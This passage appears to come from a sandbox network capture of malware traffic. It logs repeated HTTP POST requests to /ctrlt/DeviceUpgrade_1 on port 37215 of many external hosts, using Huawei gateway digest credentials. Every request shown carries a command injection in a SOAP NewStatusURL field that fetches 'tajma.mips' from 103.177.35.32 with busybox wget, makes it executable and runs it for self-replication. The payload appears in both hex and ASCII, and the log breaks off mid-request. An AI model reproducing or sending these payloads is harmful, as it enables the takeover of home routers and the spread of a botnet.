                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2312192.168.2.2345070157.151.219.16137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.585031986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2313192.168.2.234541241.242.226.10937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.585298061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2314192.168.2.2343156157.116.36.1337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.585323095 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2315192.168.2.234758441.102.194.16837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.585328102 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2316192.168.2.234009841.190.241.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.585623980 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2317192.168.2.2354820157.61.15.4337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.585758924 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2318192.168.2.2347568157.96.222.3037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.585803986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2319192.168.2.233754448.246.134.7637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.586393118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2320192.168.2.2351246157.123.217.10537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.586462021 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2321192.168.2.2353422157.177.25.13737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.586467981 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
